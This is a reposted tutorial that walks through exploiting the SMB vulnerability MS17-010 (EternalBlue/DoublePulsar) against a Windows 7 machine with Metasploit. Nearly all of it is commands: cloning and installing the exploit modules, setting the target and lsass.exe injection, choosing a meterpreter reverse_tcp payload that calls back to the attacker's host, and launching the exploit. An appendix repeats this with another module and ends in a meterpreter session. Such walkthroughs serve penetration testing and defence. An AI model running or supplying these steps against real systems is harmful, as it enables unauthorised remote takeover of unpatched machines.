SMB (MS17-010) remote command execution with msf
Environment used:
Kali (2016.2), 32-bit system. IP address: 192.168.1.104
Target machine: Win7 SP1 x64 system (firewall disabled). IP address: 192.168.1.105
The steps are as follows:
Install wine32 on the Kali system:
apt-get install wine32
Run cmd.exe with wine32, then type exit to leave the cmd prompt:
wine cmd.exe
exit
Download the exploit script with git clone:
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
Then copy the script to /usr/share/metasploit-framework/modules/exploits/windows/smb:
cd Eternalblue-Doublepulsar-Metasploit/
cp -r deps/ eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb
Start msf, then apply the following settings:
service postgresql start
msfconsole
search eternalblue
use exploit/windows/smb/eternalblue_doublepulsar
set DOUBLEPULSARPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
set ETERNALBLUEPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
set PROCESSINJECT lsass.exe
set TARGETARCHITECTURE x64
set rhost 192.168.1.105
show targets
set target 9
set payload windows/x64/meterpreter/reverse_tcp
show options
set lhost 192.168.1.104
exploit
Appendix:
The ms17-010 module in msf:
Prerequisites:
1. gem install ruby_smb    # install the ruby_smb gem
2. msfupdate    # update msf
3. msfconsole -qx "use exploit/windows/smb/ms17_010_eternalblue"    # start msf and load the module
root@backlion:/opt# wget https://raw.githubusercontent.com/backlion/metasploit-framework/master/modules/exploits/windows/smb/ms17_010_eternalblue.rb
root@backlion:/opt# cp ms17_010_eternalblue.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb
use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > set rhost 192.168.1.8
msf exploit(ms17_010_eternalblue) > set lhost 192.168.1.21
msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(ms17_010_eternalblue) > exploit
meterpreter > sysinfo
Reposted from: https://www.cnblogs.com/backlion/p/6804863.html